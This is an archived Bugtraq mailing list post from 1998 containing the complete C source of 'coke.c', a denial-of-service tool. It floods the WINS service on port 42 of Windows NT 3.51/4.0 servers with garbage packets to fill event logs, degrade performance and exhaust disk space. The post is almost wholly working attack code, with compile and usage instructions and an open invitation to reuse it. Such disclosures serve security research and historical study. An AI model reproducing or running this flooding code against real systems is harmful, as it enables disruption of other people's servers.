Bugtraq mailing list archives

coke.c

From: snupe () SLACKWARE ORG (snupe)
Date: Sat, 9 May 1998 05:33:10 -0400


/*  coke.c */

/*  coke +0.34 by crank and phuzz

    this little program exploits windowsnt servers 3.51/4.0 which
    are running wins (windows internet name service).

    depending on how the systems logging is configured it will create
    errors in the event logs, which will cause in a lack of the systems
    preformance, as well as available hard disk space.

    i've known about this exploit for sometime now, and thought everyone
    else did. but i never have seen anything for it. so here it is.

    coderight: you may use any code shown as long as credit is given.

    credit goes to:
              neonsurge who discovered this.
              justin marcus who also discovered this.

    tested on:
              slackware    kernel 2.0.32
                           kernel 2.0.33
              debian       kernel 2.0.33
              redhat       kernel 2.1.95

    compile: gcc -o coke coke.c
*/

#include <stdio.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* defines */

#define GARBAGE "just a bunch of crap really does not matter"
#define VERSION "+0.34"

/* variables */

char    *buf, *hn;
int     s, soc, con, i;
int     count, x;
int     twirl = 3;
int     countstr = 0;

/* prototypes */

int     twirly(int *twirl);
void    usage(char *argv[]);
int     main(int argc, char *argv[]);
int     sendPacket(char *buf, char *argv[]);

/* structures */

struct  sockaddr_in blah;
struct  hostent *hp;

/* let the fun begin */
int     main(int argc, char *argv[])
{
        if (argc < 3)
        {
                usage(argv);
        }
        /*  create the garbage */
        buf = (char *)malloc(10000);

        for (i = 0; i < 25; i++)
                strcat(buf, GARBAGE);
        strcat(buf, "\n");

        printf("coke %s     crank|phuzz\n\n",VERSION);

        sendPacket(buf,argv);

        for (x = 0; x <= count; x++)
        {
                sendPacket(buf,argv);

                /* just purdy stuff */
                fprintf(stderr, "\rsending packet: %d (%c)", x, twirly(&twirl));
                if (count <= 200)
                        usleep(1500*(10));
                else
                        usleep(700*(10));

                /* lets send the garbage to the server */
        }
        fprintf(stderr, "\rsending packet: %d (caffine will kill you)",--x);
        printf("\n");

        close(soc);

        /* free up our memory like good programmers */
        free(buf);

        /* done so we wont reach the end of a non-void function */
        exit(0);
}

int     sendPacket(char *buf, char *argv[])
{
        hn = argv[1];
        hp = gethostbyname(hn);

        /* number of packets to send */
        count=(atoi(argv[2]));

        /*  check target */
        if (hp==NULL)
        {
                perror("coke: gethostbyname()");
                exit(0);
        }

        bzero((char*)&blah, sizeof(blah));
        bcopy(hp->h_addr, (char *)&blah.sin_addr, hp->h_length);

        blah.sin_family = hp->h_addrtype;
        blah.sin_port = htons(42);

        /*  create a socket */
        soc = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

        if (!soc)
        {
                perror("coke: socket()");
                close(soc);
                exit(1);
        }

        /*  connect to target */
        con = connect(soc, (struct sockaddr *)&blah, sizeof(blah));

        if (!con)
        {
                perror("coke: connect()");
                close(soc);
                exit(1);
        }
        sendto(soc, buf, strlen(buf),0 ,(struct sockaddr *)&blah, sizeof(struct sockaddr));
        close(soc);
        return(0);
}

int     twirly(int *twirl)
{
        if (*twirl > 3) *twirl = 0;
        switch ((*twirl)++)
        {
                case 0: return('|'); break; case 1: return('/'); break;
                case 2: return('-'); break; case 3: return('\\'); break;
        }
        return(0);
}

/* for retards */
void    usage(char *argv[])
{
        printf("coke %s     crank|phuzz\n\nusage: %s <target> <number of packets to send>\n",VERSION,argv[0]);
        exit(0);
}

/* EOF */

Current thread:

Re: 3Com switches - undocumented access level., (continued)
- Re: 3Com switches - undocumented access level. Aleph One (May 08)
  - Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
    - Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
    - Re: 3Com switches - undocumented access level.) Joao Carlos Mendes Luis (May 10)
- Re: 3Com switches - undocumented access level. der Mouse (May 08)
  - Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
  - Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
    - Re: 3Com switches - undocumented access level. Michael Mittelstadt (May 10)
    - Re: 3Com switches - undocumented access level. NetSurfer (May 11)
  - Bay Networks Security Hole Marty Rigaletto (May 09)
    - coke.c snupe (May 09)
    - MICO: security problem: Privileges of micod for everybody! Dominique Unruh (May 10)
    - Re: MICO: security problem: Privileges of micod for everybody! Miguel de Icaza (May 10)
    - Re: Bay Networks Security Hole Jason Ackley (May 10)